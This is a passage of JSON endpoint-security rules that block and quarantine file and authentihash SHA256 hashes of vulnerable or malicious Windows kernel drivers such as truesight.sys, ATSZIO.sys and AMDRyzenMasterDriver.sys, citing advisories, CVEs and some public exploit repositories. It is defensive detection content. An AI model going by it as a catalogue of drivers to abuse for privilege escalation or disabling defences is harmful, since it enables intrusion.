+ "last_update": "2026-03-23T11:45:30.822354Z",
+ "creation_date": "2026-03-23T11:45:30.822356Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.822362Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0c66ca63774f8aa697fe172233283af90db88902204524294a4df212f9f0b949",
+ "comment": "Vulnerable Kernel Driver (aka ComputerZ.Sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0b34bcaf-45c1-5483-8b40-d62dcdfc863c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.492108Z",
+ "creation_date": "2026-03-23T11:45:31.492110Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.492116Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1292bcc9b02ffd3bd50e50873728c4dbe7278049e2d88cd33b845cefe50bfa3c",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0b378e92-55e2-5e54-b225-e15718223b8e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.830293Z",
+ "creation_date": "2026-03-23T11:45:31.830297Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.830305Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "62ede8393d076d04257526c70849b3fffac66ce9c2ffc038ba3b5f653abd93a2",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0b3c41bc-7e47-5676-bfed-d1ed6e285ed4",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.613171Z",
+ "creation_date": "2026-03-23T11:45:29.613173Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.613178Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d12acedc9a2702a18499b77dc8ae9e6b2d1eb557eb08c8a14b2ab3a984edec01",
+ "comment": "ASUS vulnerable UEFI Update Driver (aka AsUpIO64.sys and GVCIDrv64.sys) [https://codeinsecurity.wordpress.com/2016/06/12/asus-uefi-update-driver-physical-memory-readwrite/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0b3c54cb-b19a-52fd-bceb-fe9d8fbf083e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.612368Z",
+ "creation_date": "2026-03-23T11:45:29.612370Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.612375Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "31d8fc6f5fb837d5eb29db828d13ba8ee11867d86a90b2c2483a578e1d0ec43a",
+ "comment": "ASUS WinFlash vulnerable driver (aka ATSZIO.sys and ATSZIO64.sys) [https://github.com/Chigusa0w0/AsusDriversPrivEscala/blob/master/ATSZIO.md] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0b3de5da-6942-5a18-91e4-31fd0de4542f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.967900Z",
+ "creation_date": "2026-03-23T11:45:29.967902Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.967909Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2d88ac88c0fd37bc34bf547479c226abc8bff1e9e82588a42dbad36ff69c980d",
+ "comment": "Retliften malicious signed drivers (aka netfilter.sys) [https://msrc-blog.microsoft.com/2021/06/25/investigating-and-mitigating-malicious-drivers/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0b442084-73b1-533d-a7e6-49fa95e46d73",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.975308Z",
+ "creation_date": "2026-03-23T11:45:29.975310Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.975315Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ab1c74ed1ea4fc7a613aa22fd87ee4251ede260862fdebde2d7d2f00c0f23371",
+ "comment": "Vulnerable AMD Ryzen Master Driver (aka AMDRyzenMasterDriver.sys) [CVE-2020-12928, CVE-2023-20564] [https://www.loldrivers.io/drivers/13973a71-412f-4a18-a2a6-476d3853f8de/, https://github.com/tijme/amd-ryzen-master-driver-v17-exploit, https://github.com/zeze-zeze/HITCON-2023-Demo-CVE-2023-20562] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0b496ac3-07f3-5422-9d48-7b2dc469dde7",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.458279Z",
+ "creation_date": "2026-03-23T11:45:30.458282Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.458300Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a855b6ec385b3369c547a3c54e88a013dd028865aba0f3f08be84cdcbaa9a0f6",
+ "comment": "Vulnerable Kernel Driver (aka nscm.sys) [https://www.loldrivers.io/drivers/351ff5ca-f07b-4eb6-9300-d5d31514defb/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0b4c456b-aaec-5bd3-adb1-35e2ea7e8d4d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.612753Z",
+ "creation_date": "2026-03-23T11:45:29.612755Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.612760Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "18bea05d56bcbc0e23663db9b6dc79d9db3a218e711415a1e420dea2e183cb5e",
+ "comment": "ASUS WinFlash vulnerable driver (aka ATSZIO.sys and ATSZIO64.sys) [https://github.com/Chigusa0w0/AsusDriversPrivEscala/blob/master/ATSZIO.md] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0b5e4506-210b-50d1-9edc-a3f4e4159ef0",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.480347Z",
+ "creation_date": "2026-03-23T11:45:30.480351Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.480359Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1dcdd1efab9abc25f4227b37f76da295a6dc4cf810875ba34ee1d465eb709b70",
+ "comment": "Vulnerable Kernel Driver (aka GEDevDrvSYS.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0b643760-8350-5250-876b-83b16092a7e3",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.482422Z",
+ "creation_date": "2026-03-23T11:45:31.482426Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.482436Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "120150209cbf69e79a5a17336631547b5a19811b2d130672eda29a71d8b51e06",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0b6c8931-eb0c-5dd1-a939-2bfcd9ad18c3",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.488986Z",
+ "creation_date": "2026-03-23T11:45:31.488988Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.488993Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "08fe4d58f3ad3b133f61482a79087478fcc5bd67e77d1989bafbeb2c1443ab6f",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0b7093c7-4b51-59e4-97dc-d52a26e50874",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.982607Z",
+ "creation_date": "2026-03-23T11:45:29.982609Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.982615Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "927c2a580d51a598177fa54c65e9d2610f5f212f1b6cb2fbf2740b64368f010a",
+ "comment": "Vulnerable Kernel Driver (aka driver7-x86-withoutdbg.sys) [https://www.loldrivers.io/drivers/d9f2c3d6-160c-4eb3-8547-894fcf810342/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0b787999-baf3-5e7c-af28-533cea2e959c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.620640Z",
+ "creation_date": "2026-03-23T11:45:29.620642Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.620648Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "76b86543ce05540048f954fed37bdda66360c4a3ddb8328213d5aef7a960c184",
+ "comment": "IBM Vulnerable Physmem drivers (aka citmdrv_amd64.sys and citmdrv_ia64.sys) [https://www.loldrivers.io/drivers/0f21a584-6ace-4242-82cb-9766cea6973a/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0b83401b-0090-5038-b99c-5f6581974168",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.148608Z",
+ "creation_date": "2026-03-23T11:45:31.148610Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.148615Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "30a3428361788d8223b799bc246ac924ebcb368ddd50e58b3331815f14bfd581",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0b8826cd-ec92-506c-b062-f5eaae80ddb8",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.834696Z",
+ "creation_date": "2026-03-23T11:45:30.834700Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.834709Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "16826601eb8274fbc8d43508f34a68cc68298b2990e507adb1914df21b403674",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0b8abb26-a356-59e6-b179-1a80e3357d06",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.817644Z",
+ "creation_date": "2026-03-23T11:45:30.817645Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.817651Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "163912dfa4ad141e689e1625e994ab7c1f335410ebff0ade86bda3b7cdf6e065",
+ "comment": "Vulnerable Kernel Driver (aka dellbios.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0b953ef0-fcbd-5b42-be37-a976e95f67cc",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.818030Z",
+ "creation_date": "2026-03-23T11:45:31.818034Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.818042Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c7d93ea1f42314ccfd60ecacdd7d006a1b6f0db13431bf0484ab1aef67aa2408",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0ba7ca57-c00e-571b-9ae4-88ff5300564c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.491144Z",
+ "creation_date": "2026-03-23T11:45:31.491147Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.491156Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e033951baa8fca27e55a540c993ae0d6ae150f6f674649b94f0167452ced7932",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0bbfe8f1-6074-5c56-83ed-8de5b0a44a50",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.826692Z",
+ "creation_date": "2026-03-23T11:45:30.826694Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.826700Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6c4ac19ff54da8d0670759be48a3c02face5bb9e8b12a7609f0ef1807b8cfa9f",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0bcecd76-6f3e-516f-a64a-f85085c9cf67",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.836699Z",
+ "creation_date": "2026-03-23T11:45:30.836701Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.836707Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6b8b754f5f1c00cc3eaa66baed4767317ab34054a36234c8a0c83f5e7422142e",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0bd576e8-30c8-5d8a-93f2-e89522cd2997",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.836082Z",
+ "creation_date": "2026-03-23T11:45:30.836084Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.836215Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1de4ea34aa10a60b0d6aec02ec57fa77ad2a30a43713d0bed7b5e375f86ddb2f",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0bd98ca3-8332-56e1-bae4-5fb35398f0e1",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.604735Z",
+ "creation_date": "2026-03-23T11:45:29.604737Z",
+ "enabled": true,
